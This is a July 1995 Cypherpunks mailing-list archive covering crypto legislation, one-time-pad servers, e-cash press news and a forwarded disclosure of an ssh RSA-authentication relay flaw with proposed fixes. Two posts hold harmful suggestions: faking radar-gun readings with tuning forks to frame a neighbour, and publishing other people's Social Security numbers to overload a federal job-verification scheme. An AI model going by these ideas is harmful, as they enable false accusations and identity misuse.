believe that the UK, Canada and Australia remain tolerable and decent places to live, and they too are considered part of the Free World. If Senator Grassly's bill is enacted into law, it will not be the End of the World. The United States will not suddenly have become Nazi Germany. This country will remain, for the vast majority of Americans and even most cypherpunks, a tolerable and decent place to live. It will still be one of the few countries in the world to grant its citizens the relatively unchecked freedom to speak their minds, to work at whatever profession or occupation they wish, to travel where they wish. It just means that a tiny bit more of our rights will have been eroded, our freedom lost - a little bit more of what used to make this a special place, of what used to make this country different from - and in my opinion as a still somewhat patriotic American - better than France, Canada, Australia and the UK - will have disappeared. From asb at nexor.co.uk Fri Jul 14 02:14:49 1995 From: asb at nexor.co.uk (Andy Brown) Date: Fri, 14 Jul 95 02:14:49 PDT Subject: OTP server.. In-Reply-To: Message-ID: On Fri, 14 Jul 1995, Black Unicorn wrote: > doug at eng.auburn.edu wrote: >> How about WWW one time pad servers? You browse to your >> favorite OTP server, which has a random number generator >> running in the background. You tell it to give you a block >> of X bytes, and mail it to persons 1, 2, 3, ... N. >> [...] >> Thoughts? >> > I think you're trusting the server a GREAT deal. A small addition to the protocol whereby the recipient gives the random data the once-over with a personal IDEA key would be sufficient to eliminate any doubts about the server. - Andy +-------------------------------------------------------------------------+ | Andrew Brown Internet Telephone +44 115 952 0585 | | PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A C0 1F 9F 66 64 02 4C 88 | +-------------------------------------------------------------------------+ From stewarts at ix.netcom.com Fri Jul 14 02:19:59 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 14 Jul 95 02:19:59 PDT Subject: speeding detected by civilians Message-ID: <199507140918.CAA04658@ix2.ix.netcom.com> At 02:01 PM 7/13/95 -0700, Vladimir Z. Nuri wrote: >Vernon Hills, Illinois, a Chicago suburb, has passed legislation allowing >citizens to check out radar guns from the local police department to >catch speeders in their community. The radar guns are combined with >cameras in order to instantaneously capture the car, license number, and the >rate of speed. The citizens can check out the units for a week at a time. The >police have stated that they, at this time, will use the data to issue >warning letters to the violaters. I wonder how they'll feel if citizens start tracking the speeds of police cars and reporting them..... :-) # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From stewarts at ix.netcom.com Fri Jul 14 02:20:11 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 14 Jul 95 02:20:11 PDT Subject: Fight, or Roll Over? Message-ID: <199507140918.CAA04669@ix2.ix.netcom.com> At 03:56 PM 7/13/95 -0700, Timothy C. May wrote: >criminalizes groups which support This Year's Enemies. (Like the War with >Oceania--or was it Eurasia?--the friend of today was yesterday's criminal >organization. Wow! The Oceania folks haven't even raised enough funds to make a credible floating city, and already they're at war!? (Or, alternatively, No, Oceania's always been at war with _East_asia...) >Some would say this means Cypherpunks should step into the fray and become >a lobbying group. I don't see us as having the structure or organization to >become such a group. Those who wish to should probably form a real group to >do this, with bylaws and elected officials. There's already an EFF, and lobbying probably looks better with our EFF hats on than with Cypherpunks hats and non-exportable T-Shirts on. Cypherpunks is more for lobbying the public by putting out code than for lobbying CONgress. >Anarchies are great, but there's no way an anarchy can have a "spokesman," >or a budget for travel and lobbying, or a hundred other things that a >lobbying group needs. Cypherpunks--this list--is just not in a position to >be this group. Consensus-oriented coalitions can also work marvelously inefficiently :-) # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From rogaski at phobos.lib.iup.edu Fri Jul 14 05:41:09 1995 From: rogaski at phobos.lib.iup.edu (Mark Rogaski) Date: Fri, 14 Jul 95 05:41:09 PDT Subject: speeding detected by civilians In-Reply-To: <199507132101.OAA27319@netcom12.netcom.com> Message-ID: <199507141241.IAA24832@phobos.lib.iup.edu> -----BEGIN PGP SIGNED MESSAGE----- - From the node of Vladimir Z. Nuri: : : Vernon Hills, IL. : : Vernon Hills, Illinois, a Chicago suburb, has passed legislation allowing : citizens to check out radar guns from the local police department to : catch speeders in their community. The radar guns are combined with : cameras in order to instantaneously capture the car, license number, and the : rate of speed. The citizens can check out the units for a week at a time. The : police have stated that they, at this time, will use the data to issue : warning letters to the violaters. : Got a neighbor you don't like? Rent one of these here radar guns and get a set of tuning forks. Set up the unit to catch your target, and then just hold a tuning fork up in front of the unit (but out of range of the mounted camera). PS -- Didn't traffic cops have one of the highest rates of testicular cancer by occupation due to the widespread habit of resting radar guns in their laps without switching them off? - ----- #include Mark Rogaski 100,000 lemmings rogaski at phobos.lib.iup.edu aka Doc, wendigo can't be wrong! http://www.lib.iup.edu/~rogaski/ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMAZlyx0c4/pqJauBAQHysAQAtEsBrdEJ9Esiybu9L8/398oaALrWGHuz 5UeeIfeaXEsG+c/Ns3T7pK47kRGNt5aa/xsT++sC0vqzXgWwZU4UnIMF5Lic8tsW c35+EML7CEK77EvLzqwYMheowSptHKMGhwy0GhBFXl1vA0zCP66Hho3RstkFEDeg wNIiyJQzG10= =TGLu -----END PGP SIGNATURE----- From rah at shipwright.com Fri Jul 14 06:23:11 1995 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 14 Jul 95 06:23:11 PDT Subject: Checkfree/Cybercash Press release Message-ID: >Date: Fri, 14 Jul 1995 03:42:07 -0700 >From: Davidwfox at eworld.com >To: www-buyinfo at allegra.att.com, e-payment at bellcore.com >Subject: Checkfree/Cybercash Press release > >CHECKFREE AND CYBERCASH JOIN FORCES TO DELIVER COMPREHENSIVE ELECTRONIC COM > > Consumers can conduct Internet transactions using checks, > credit cards or cash > > BOSTON, July 13 /PRNewswire/ -- Checkfree Corporation and CyberCash, >Inc. announced today at the Interactive Services Association conference >that they will cooperatively develop and market products and services >that will allow consumers to safely conduct payment transactions, in >real time, over the Internet using credit cards, debit cards, checks or >cash. > Checkfree, the nation's leading provider of electronic commerce >services, will license technology from CyberCash, a leader in secure, >end-to-end Internet payment systems. Checkfree will integrate >CyberCash's high level security features and ability to conduct cash >transactions into the Checkfree Wallet(TM), creating a single solution >for electronic payment transactions that offers checks, credit cards, >cash, coin or micropayments. > "Partnering with CyberCash was the logical choice for Checkfree," >says Pete Kight, founder and CEO of Checkfree. "Checkfree is committed >to leading the way for electronic commerce, and providing plug and play >Internet transaction solutions. The Checkfree Wallet(TM) is now an even >more attractive transaction platform for both consumers and merchants." > The Checkfree Wallet(TM) was introduced in April to allow consumers >to purchases goods and services from on-line merchants in a safe, >convenient and familiar manner. The Checkfree Wallet(TM) does not >require prior registration with merchants, and on-line shoppers pay no >fees or transaction service charges. With the addition of CyberCash's >technology consumers will be able to utilize cash securely over the >Internet and merchants will receive authorization in real time. In >addition, merchants will be able to accept payments from any on-line >consumers, regardless of the server or browser they are using. > "Checkfree's long, successful record of developing applications for >home banking and electronic bill payment is a perfect complement to >CyberCash's secure Internet transaction and electronic cash expertise," >said Magdalena Yesil, vice president of marketing for CyberCash. >"Together we can offer a complete array of payment tools that allow >consumers to conduct spontaneous transactions and pay bills via the >Internet." > Checkfree and CyberCash will focus on developing products that can >be easily integrated into any browser system and merchant server. The >new Internet transaction product offering, which will be co-branded by >Checkfree and CyberCash, is scheduled for release this fall. The >product will initially be available free-of-charge via NetCom's >NetCruiser Internet browser as well as other leading Internet browsers. >Merchant interest to date also includes ID Software, the developers of >Doom(TM). > > About CyberCash > CyberCash, Inc. of Reston, Virginia, was founded in August 1994 to >partner with financial institutions and providers of goods and services >to deliver secure Internet payment systems. The CyberCash approach is >based on establishing a trusted link between the seeming unpredictable >world of cyberspace and the traditional banking world. CyberCash serves >as a conduit through which payments can be transported easily, safely >and instantaneously between buyers, sellers and their banks. > The CyberCash system operates on top of any general security system >such as SSL or Secure HTTP. CyberCash beta software is currently >available free-of-charge and can be downloaded from the company's WWW >server at http://www.cybercash.com. The company's initial service that >accepts payments using any major credit card is scheduled for full >commercial deployment this summer. Electronic cash services are >expected by the end of 1995. > CyberCash's principal founders, Bill Melton and Dan Lynch, have >brought together a team with unparalleled experience in credit card and >debit card automation, internet telecommunications and security. In >April, CyberCash was chosen by Interactive Age as one of the 100 Best >Business Web Sites. For further information about CyberCash, access its >WWW server or call 800-9CYBER1. > > About Checkfree > Checkfree Corporation, the nation's leading electronic commerce >company, last year processed more than $6 billion in payments for >consumers and corporate clients, with more than six million consumers >and one million businesses benefiting from its services. Checkfree >serves consumers, business and financial institutions with a wide array >of product and service offerings, each finely tuned to the specific >needs of its users. All leverage Checkfree's extensive technology >infrastructure which includes its patented and proven electronic bill >payment system. Founded in 1981, Checkfree Corporation is headquartered >in Columbus, Ohio, where it employs 370 full-time associates. Checkfree >is privately held. > For additional information about Checkfree, access its worldwide web >server at: http://www.checkfree.com > -0- 7/13/95 >/CONTACT: Jennifer Sims, 415-904-7070, ext. 275 or >, or Nicol Davis, 415-904 7070, ext 281, or >, both of Access Public Relations, for Checkfree; >or Susan Ice of Thomas Associates, 415-325-6236, or susani at thomaspr.com >for CyberCash, Inc./ > ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From pfarrell at netcom.com Fri Jul 14 06:29:35 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Fri, 14 Jul 95 06:29:35 PDT Subject: Fight, or Roll Over? Message-ID: <34125.pfarrell@netcom.com> In message Thu, 13 Jul 1995 02:41:12 -0800, cman at communities.com (Douglas Barnes) writes: > Since the Anti-Electronic Racketeering Act of 1995 might as well > be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see > Tim throw in the towel already, when the bill hasn't even made it > through committee yet. OK, lets start some traditional politics. Anyone know what commitee has jurisdiction? Then the next step is who is on the commitee? Then which cypherpunks are constituents of the commitee members? At least some on the list write software for a living, or run ISPs and this could effect their livelihood. Talk economic impact, not buzzwords like "freedom" and apple pie. Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From schampeo at imonics.com Fri Jul 14 06:35:48 1995 From: schampeo at imonics.com (Steven Champeon - Imonics Development) Date: Fri, 14 Jul 95 06:35:48 PDT Subject: Eudora MacPGP Woes Message-ID: <9507141334.AA07025@fugazi.imonics.com> | From: "Robert A. Rosenberg" | Subject: Re: Eudora MacPGP Woes | | At 14:40 7/8/95, Black Unicorn wrote: | >I have noticed that an X-Attachement: header is added, but I have no idea | >how to remove it without opening the Eudora outbox with teachtext or | >something. | | Highlight the file name on the attachments line and hit delete to remove an | attached file request. I guess I'm still confused about why there's an X-Attachment: header being added. If the file is being generated by MacPGP without using the Applescript, you can simply open the resulting encoded file (provided it is being ascii- armored) from within Eudora then copy and paste it into an open Compose window. Voila. No X-Attachment: header. If you delete the file name on the attachments line, it also removes the attachment. Mr. Unicorn: have you had any luck with the Applescript? You might try booting without extensions (except for Applescript) and open Eudora off-line and keep trying. Hope this helps, Steve From merriman at arn.net Fri Jul 14 06:40:38 1995 From: merriman at arn.net (David K. Merriman) Date: Fri, 14 Jul 95 06:40:38 PDT Subject: Suing/Reputations (was: Root Causes) Message-ID: <199507141348.IAA09516@arnet.arn.net> Thus did FrogFarm (?? :-) bespake: ... ... This sounds like what I was thinking of. Dave Merriman This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th of the PGP executable. See below for getting YOUR chunk! ------------------ PGP.ZIP Part [015/713] ------------------- M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8 at X'HB_9H#&\X MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3 M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ From Doug.Hughes at Eng.Auburn.EDU Fri Jul 14 06:49:27 1995 From: Doug.Hughes at Eng.Auburn.EDU (Doug Hughes) Date: Fri, 14 Jul 95 06:49:27 PDT Subject: OTP server.. In-Reply-To: <9507140235.AA13456@snark.imsi.com> Message-ID: Perry Metzger writes: > >Doug Hughes writes: >> How about WWW one time pad servers? You browse to your >> favorite OTP server, which has a random number generator >> running in the background. You tell it to give you a block >> of X bytes, and mail it to persons 1, 2, 3, ... N. > >Do I get you wrong, or are you proposing the mailing of one time pads >in the clear? > Not necessarily. It could be sent any number of different ways. Heck, you could mail (email, US, fedex) a bunch of passphrases or whatever to a site (as an extreme example) to xor with the random number string. They send you the product, you xor with your passphrases in the appropriate order, and you have the true random number string. Of course the feds could just get a court order and snarf all your passphrases or keys if it was in this country. People would probably be better off using a server in another country and having the pad sent to them encrypted or hashed in some fashion. >> Enough of these things would be REALLY tough to monitor... > >The NSA is willing to monitor virtually all international >telecommunications traffic and try to figure out whats interesting. I >doubt this poses much of a challenge to them. Not to mention the fact >that it probably wouldn't pose much of a challenge to *me* given a set >of wiretaps and I have virtually no resources... > What if we just call them random number servers? Does that make them uninteresting? What if there are dozens or hundreds of them receiving thousands or 10's of thousands of connections a day? (Of course this couldn't happen overnight. :) ) After all, there are plenty of good purposes to which you can put a random number, but a OTP is probably suspicious enough to warrant scrutiny. Maybe it's all too much work for too little value. All you need is one byte or int, or whatever to xor with the RN before it's send to you over the length of the int. Securely getting these bytes/keys to the server might be tricky. Maybe it's impossible. US Mail is still guaranteed to be private.. (don't everybody laugh at once. ;) ) Okay, assuming that the OTP idea just won't fly, is a general purpose random number generating web site, or internet service of interest? It could be a useful thing for a seed for individuals who want to do their own OTP-ing. (Hey stan, I'll get us both an RN from the server on the net, XOR each byte with 0x3e and will use that as an OTP for a secret message). For frequent use it might be a huge bust because you'd need a secure channel to get a secure channel. -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug at eng.auburn.edu "Real programmers use cat > file.as" From samman at CS.YALE.EDU Fri Jul 14 06:51:42 1995 From: samman at CS.YALE.EDU (Rev. Ben) Date: Fri, 14 Jul 95 06:51:42 PDT Subject: Ssh security hole? In-Reply-To: <199507132303.CAA18383@shadows.cs.hut.fi> Message-ID: On Fri, 14 Jul 1995, Tatu Ylonen wrote: > I think you are right in your analysis. There is indeed a problem > with RSA authentication. Basically what this means is that if you log > into a corrupt host, that host can at the same time log into another > host with your account (by fooling you to answer to the request) > provided that you use the same RSA identity for both hosts. Bruce Schnier calls this the GrandMaster Problem in the Applied Crypto section on Zero Knowledge Authentication. This can be skewed by requiring synchroneous transmissions within a very small synchronized time window. Ben. ____ Ben Samman..............................................samman at cs.yale.edu I have learned silence from the talkative, toleration from the intolerant, and kindness from the unkind; yet, strange, I am ungrateful to those teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND! For information Email: zldf at clark.net http://www.netresponse.com/zldf Original message follows: _______________________________________________________________ > A workaround is to use a different identity for each host you use. > The default identity can be specified on a per-host basis in the > configuration file, or by -i options. > > And, yes, I think the same problem might occur with client host > authentication. Though, there you would still have to do IP-spoofing, > DNS spoofing or similar to get through (breaking RSA based host client > effectively reduces RhostsRSAAuthentication to conventional .rhosts > authentication). > > The protocol will need to be changed somewhat because of this. I'll > think about it tomorrow and let you say you opinion about it. > > Thanks! > > Tatu Ylonen > > Date: Thu, 13 Jul 1995 13:08:15 -0700 > From: David Mazieres > To: ssh-bugs at cs.hut.fi > Cc: rtm at eecs.harvard.edu, dm at eecs.harvard.edu, tbl at eecs.harvard.edu > Subject: Ssh security hole? > > I believe there is a serious problem with the RSA authentication > scheeme used in ssh, but then again I could be misreading the proposed > RFC. Is the following really the case? > > As I understand the protocol, here is what happens during SSH_AUTH_RSA > authentication. > > Suppose the holder of SKu, is allowed access to account U on machine B > (which holds SKb). Both PKu and PKb are widely known. In addition, > machine B has a session key, PKs, which changes every hour. When U on > machine A wants to log into machine B, here's what I think happens > based on my reading of the RFC: > > A -> B: A > > B -> A: (PKb, PKs, COOKIE) > [A flags an error if PKb is not the stored value.] > > A -> B: (COOKIE, {{Kab}_PKs}_PKb) > A -> B: {U}_Kab > A -> B: {PKu}_Kab > [B aborts if SKu is not allowed access to account U.] > > B -> A: {{N}_PKu}_Kab > > A -> B: {{N}_MD5}_Kab (*) > [B aborts if the MD5 hash is invalid.] > > B -> A: access to acount U with all data encrypted by Kab. > > The problem is, suppose U actually wanted to log into machine C, which > was maintained by an untrusted person. The person maintaining C could > initiate a connection to B the minute U tried to log into C. When > given a challenge {{N}_PKu}_Kbc, C could simply give this to A as the > challenge to respond to, and then forward the response to B. > > To fix the problem, A must at the very least include B in the > response line marked (*). I have reason to believe (after having just > seen a lecture on authentication), that you might even need to include > more. A safe bet might be (but then again I am no expert): > > A -> B: {(N, A, B, Kab)}_MD5 > > I think similar problems arise for the other authentication methods. > > Other than that, though, I am really impressed by by ssh. It's easy > to install and easy to use. In fact, it is even more convenient to > use than standard rsh, because the X forwarding happens > automatically. > > Thanks for such a great package! > > David > From samman at CS.YALE.EDU Fri Jul 14 06:53:15 1995 From: samman at CS.YALE.EDU (Rev. Ben) Date: Fri, 14 Jul 95 06:53:15 PDT Subject: OTP server.. In-Reply-To: Message-ID: On Thu, 13 Jul 1995, Ed Carp [khijol Sysadmin] wrote: > On Fri, 14 Jul 1995, Black Unicorn wrote: > > > >How about WWW one time pad servers? You browse to your > > >favorite OTP server, which has a random number generator > > >running in the background. You tell it to give you a block > > >of X bytes, and mail it to persons 1, 2, 3, ... N. > > > > I think you're trusting the server a GREAT deal. > > Why is that? The randomness of the data can be easily checked... Because if the server is compromised to KEEP the data that it mails to you and those other people, you can have a PERFECTLY random OTP, and because of the particulars of XOR, your communication has been compromised. Ben. ____ Ben Samman..............................................samman at cs.yale.edu I have learned silence from the talkative, toleration from the intolerant, and kindness from the unkind; yet, strange, I am ungrateful to those teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND! For information Email: zldf at clark.net http://www.netresponse.com/zldf From pfarrell at netcom.com Fri Jul 14 07:01:42 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Fri, 14 Jul 95 07:01:42 PDT Subject: Fight, or Roll Over? Message-ID: <36063.pfarrell@netcom.com> In message Thu, 13 Jul 1995 16:12:16 -0700, tcmay at sensemedia.net (Timothy C. May) writes: > > There was once talk, in April of '93, about the Washington, D.C. > Cypherpunks group adopting "lobbying" as their own special focus area, > with educational visits to Congressional aides and attendance at > crypto-related hearings. Nothing came of this, for whatever reasons. My cut on why it failed is that lobbying is too hard to do effectivly on a part time basis, and those attending that the meeting realised it. On a full time basis, lobbying is expensive, and requires that you raise tons of money. The EFF found tons of money, and sponsored last year's Digital Telephony disaster. He who pays the piper names the tune. EFF got lots of corporate money, and "liked" the 94 DT bill. So they're gone. > say one thing: the leaders of EFF may have realized what a trap lobbying > can become, and have chosen to instead focus on other areas.) I read this in their actions too. > Anyway, Cypherpunks is a worldwide, technological-oriented group. We can Cypherpunks write code? There is nothing vaguely pro-government about much of strong cryptography. Tim's sig, fall of governments, and all that. Why should they listen to us? Write code. Send money to EPIC and ACLU, let them lobby. Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From samman at CS.YALE.EDU Fri Jul 14 07:04:13 1995 From: samman at CS.YALE.EDU (Rev. Ben) Date: Fri, 14 Jul 95 07:04:13 PDT Subject: Legislation question... In-Reply-To: <199507140331.AA07147@tyrell.net> Message-ID: On Thu, 13 Jul 1995, Phil Fraering wrote: > I may be a bit behind the times, but I have a question > about the "ban crypto-anarchy" legislation as well as > the Exon amendment: > > Isn't legislation in this country supposed to start in the > House and _then_ move to the Senate for approval? Only ones that involve money. The House was given the Power of the Purse by the original Constitutional Congress. Ben. ____ Ben Samman..............................................samman at cs.yale.edu I have learned silence from the talkative, toleration from the intolerant, and kindness from the unkind; yet, strange, I am ungrateful to those teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND! For information Email: zldf at clark.net http://www.netresponse.com/zldf From rsalz at osf.org Fri Jul 14 07:51:03 1995 From: rsalz at osf.org (Rich Salz) Date: Fri, 14 Jul 95 07:51:03 PDT Subject: HR361 Message-ID: <9507141445.AA10682@sulphur.osf.org> Has anyone previously noted that HR361, the omnibus export administration act, would require the administration to assess the impact of the current crypto export controls on the software industry? I don't recall seeing mention of it, but this has been planned for awhile. There were a couple of crypto surveys, one by private industry (software publisher's association) and one by TIS for the gov't. I think. Both were mentioned in this list. /r$ From rsalz at osf.org Fri Jul 14 08:19:00 1995 From: rsalz at osf.org (Rich Salz) Date: Fri, 14 Jul 95 08:19:00 PDT Subject: LD tentacle? Message-ID: <9507141513.AA10727@sulphur.osf.org> > From: jbass at dmsd.com (John L. Bass) He is a long-long-time Unix hacker. Designed the first file-locking stuff (flock?) and gave it away to the Unix community. Last I heard was working on high-performance filesystems. /r$ From jya at pipeline.com Fri Jul 14 08:19:30 1995 From: jya at pipeline.com (John Young) Date: Fri, 14 Jul 95 08:19:30 PDT Subject: MYS_fit Message-ID: <199507141519.LAA15117@pipe3.nyc.pipeline.com> 7-14-95. NYPaper Page Oner, longish: "2 Groups of Physicists Produce Matter That Einstein Postulated." By chilling a cloud of atoms to a temperature barely above absolute zero, scientists at a Colorado laboratory have at last created a bizarre type of matter that had eluded experimenters ever since its potential existence was postulated by Albert Einstein 70 years ago. The creation of this Bose-Einstein condensate -- named for Einstein, and the Indian theorist Satyendra Nath Bose -- was hailed yesterday as the basis of a new field of research expected to explain some fundamental mysteries of atomic physics. A Texas group later produced similar results. The achievement should allow physicists to peer directly into the realm of the ultrasmall. MYS_fit [This was also reported in The Economist of July 1.] From jya at pipeline.com Fri Jul 14 08:21:27 1995 From: jya at pipeline.com (John Young) Date: Fri, 14 Jul 95 08:21:27 PDT Subject: SEK_hep Message-ID: <199507141521.LAA15320@pipe3.nyc.pipeline.com> 7-14-95. NYPaper: "U.S. Spells Out Antitrust Inquiry Into Microsoft." The Justice Department said today that the Microsoft Corporation might well be violating antitrust laws by including software for its new on-line network in Windows 95, its much-anticipated operating system for personal computers. JUS_kid "Sting on Internet Leads to a Child Sex Case." In a case involving child pornography, the Internet and a self-appointed enforcer whom one critical defense lawyer calls an "electronic vigilante," a Nevada man is facing prison for crossing state lines with the intention of having sex with a 14 year-old girl he had met on a popular computer network. SHE_dev [Editorial] "The Guns of Waco and Ruby Ridge." There is little doubt that the Federal Government contributed heavily to two of the biggest law enforcement fiascoes in recent memory. One was the disastrous 1993 Federal raid on the Branch Davidian compound at Waco, Tex. The other was the tragic 1992 encounter between the F.B.I. and a band of white separatists at Ruby Ridge, Idaho. LIT_bub 3: SEK_hep From frissell at panix.com Fri Jul 14 08:21:52 1995 From: frissell at panix.com (Duncan Frissell) Date: Fri, 14 Jul 95 08:21:52 PDT Subject: Root Causes Message-ID: <199507141521.LAA09745@panix.com> At 08:42 PM 7/13/95 -0500, David K. Merriman wrote: >Is there any precedence or possibility of either filing civil or criminal >charges against a Government official for their _official_ actions? >Something that will not only make for some Serious Press, but hit them from >an unexpected angle? Constitution of the US Article 1, Section 6 (1.) The Senators and Representatives shall receive a Compensation for their Services to be ascertained by Law, and paid out of the Treasury of the United States. They shall in all Cases, except Treason, Felony and Breach of the Peace, be privileged from Arrest during their Attendance at the Session of their respective Houses, and in going to and returning from the same; and for any Speech or Debate in either House, they shall not be questioned in any other Place. DCF From paul at poboy.b17c.ingr.com Fri Jul 14 08:36:26 1995 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Fri, 14 Jul 95 08:36:26 PDT Subject: So, where's the key? Message-ID: <199507141533.AA17772@poboy.b17c.ingr.com> -----BEGIN PGP SIGNED MESSAGE----- The Cypherpunks Key-Cracking project is complete, but AFAIK no one's reported the successful key. Either people haven't completed all the key chunks they've signed out for, or something's wrong with our methodology. A third alternative is that the lucky lottery winner just missed the results, and a fourth is that I just missed it. - -Paul - -- Paul Robichaux, KD4JZG | Do you support free speech? Even when perobich at ingr.com | you don't like what's being said? Be a cryptography user. Ask me how. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMAaOQKfb4pLe9tolAQF8EgQApwrvjBHEPkI2VWG9NaaFU4yHKtkj9EZX ok3xvAfIYslKqPOJ1nJH9KBxBxNk7Dk8xMPxfnfGzPWyUqwLyeBofSdTxTmWf+An 6OiVeT4RLLIJadQbunJHhXZHq7sdOH7HKQ8SpvGSXC0/ZT1XAPOjf6swBBC0LRWS Rb8wlPCy4zs= =cKVs -----END PGP SIGNATURE----- From frissell at panix.com Fri Jul 14 08:51:06 1995 From: frissell at panix.com (Duncan Frissell) Date: Fri, 14 Jul 95 08:51:06 PDT Subject: Proposed SS#/Federal Job Licensing DOS Attack Message-ID: <199507141550.LAA15525@panix.com> On another subject entirely... I have naturally been concerned about the Feds' proposal to set up a national job licensing system. In order to protect us from hordes of illegals, they have suggested that employers be required to check SS#-True Name matches before employment could begin. This amounts to requiring federal permission for the 55 million annual job changes. Initially, it is supposed to be restricted to checking SS# validity, name match, and non multiple use. Later (as with driver's licenses) they will add restrictions having to do with tax compliance, child support compliance, library fine compliance, etc. After all, we wouldn't want tax evading, deadbeat dad, library scofflaws working in Amerika, would we? This suggests am interesting Denial of Service (DOS) attack. If you published your own or others' SS#-True Name pairs on a public forum (currently completely legal BTW), multiple use could be encouraged, the TrueNames would become unemployable, and interesting litigation would result. If done enough, systemic breakdown would occur. I am anxious to see the regs (they are just at the talking stage) to see how they handle "exceptions" like thus. DCF "Who in spite of the fact that he has changed jobs since November 1986, has yet to fill out an I-9 form. He *loves* contract employment." From terrell at sam.neosoft.com Fri Jul 14 09:48:09 1995 From: terrell at sam.neosoft.com (Buford Terrell) Date: Fri, 14 Jul 95 09:48:09 PDT Subject: Fight, or Roll Over? Message-ID: <199507141652.LAA20979@sam.neosoft.com> Doug Barnes wrote:> >This means, for those not reading between the lines, doing something >more than online ranting and petition-signing, such as getting out the >checkbook and supporting those who are organized to fight these things, >and actually getting off the dime and doing things like writing letters, >sending telegrams, and otherwise harassing our elected beings through >media that they understand (since, clearly, they _don't_ understand >the Internet -- if they did, they wouldn't propose legislation like this.) > >Yes, the "bad guys" can crank out unfriendly legislation faster than >the "good guys" can fight it, but since we are clearly not ready to offer >technological solutions this month, the "good guys" act as a valuable >brake on this current swing of the pendulum. > Cypherpunks can do more by being cypherpunks. Your keyboards are better weapons than checkbooks in this case. Why isn't PGP so simple that every luzer on AOL will use it without thinking? Why hasn't the NetScape key been broken? Prove these proposed laws are just as silly and ineffective as they look by demonstrating it. Lots of people will attack these laws on legal grounds, and you should too if your conscience so moves you, but very few have the capabilities to attack them on technical grounds where their vulnerabilities are real, not just a matter of opinion. Buford C. Terrell 1303 San Jacinto Street Professor of Law Houston, TX 77002 South Texas College of Law voice (713)646-1857 terrell at sam.neosoft.com fax (713)646-1766 From vznuri at netcom.com Fri Jul 14 09:50:49 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Fri, 14 Jul 95 09:50:49 PDT Subject: highway monitoring Message-ID: <199507141649.JAA27462@netcom17.netcom.com> some info on highway monitoring/tracking programs starting up.. all with major privacy implications... ------- Forwarded Message Date: Mon, 10 Jul 1995 18:40:55 -0700 From: Phil Agre To: rre at weber.ucsd.edu Subject: Intelligent Vehicle-Highway Systems (60K bytes) [Frank Durand is a concerned citizen in Washington State who is campaigning to require public discussion before the state adopts a far-reaching "intelligent vehicle-highway systems" plan. Some of the state's plans raise questions about privacy (among other things). He recently sent me the enclosed document, which he got from Peter Marshall from KSER Public Affairs in Seattle. It is a status report on the state Department of Transportation's advanced technology projects, and it conveys a vivid sense of how the bureaucrats and their industry partners are thinking. I would encourage everybody to call up their local state (or provincial or national) Department of Transportation or regional transportation authority, ask to speak to the expert on IVHS (or, in most countries besides the US, "transport informatics"), and politely ask for the current status report on that jurisdiction's advanced transportation technology projects. (If they tell you it doesn't exist, they're confused or playing bureaucratic games. Perhaps you didn't ask for it by the right name. Persist.) See if you can get the report in electronic form; otherwise get it in paper form and get someone to scan it. The potential privacy problems with these systems can all be solved without significant sacrifices in functionality or cost, so far as I can tell, through suitable choices of technology -- provided the people in charge have been sensitized to the issues and persuaded to take the effort to do it in the right way rather than the convenient way. This is an urgent issue -- these plans are getting set in stone throughout most of the world RIGHT NOW. Let me know what you come up with. ITS America, by the way, is the trade association of US IVHS suppliers; it is also an advisory board to the US Department of Transportation. I'll be leaving for a meeting on IVHS privacy issues at ITS America on July 22nd. If you come up with any relevant information, it would be great if you could send it to me by then. Or else post details on the Privacy Digest, privacy at vortex.com. -- Phil Agre, pagre at ucsd.edu] Date: Thu, 29 Jun 1995 13:57:15 -0700 From: fwd at ix.netcom.com (Franklin W. Durand) To: pagre at ucsd.edu Subject: Washington IVHS Status Report - June 1995 [...] P.S. Here is a little interesting trivia (some you know) regarding Washington State's links to ITS America: * Jack Kay is Chair of ITS America's Executive Committe - JHK & Associates wrote "Venture Washington" for WSDOT. * Les Jacobson is Chair of ITS America's ATMS Technical Committee - Les Jacobsen is in Seattle and work for WSDOT. * Walter Zavoli of Etak is Chair ITS America's Personal Portable Advanced Travelor Information Systems Technical Committee - Etak is in partnership with WSDOT, Metro (Seattle), IBM and Delco on the SWIFT Project (Seattle Wide Area Information Technology) in Seattle which received and $7 million USDOT grant for the project. * Lawrence Yermack of Parson Brinkerhoff International is Chair of ITS America's ETTM (Electronic Toll and Traffic Management) Technical Committee - - - Parsons Brinkerhoff is one of the partners in Washington Transportation Partners (developers for the Evergreen Point Bridge Project in Seattle). - - ------------------------------------------------------------------------------ Advanced Technology Branch Status Report 1 June, 1995 Status Report of Active 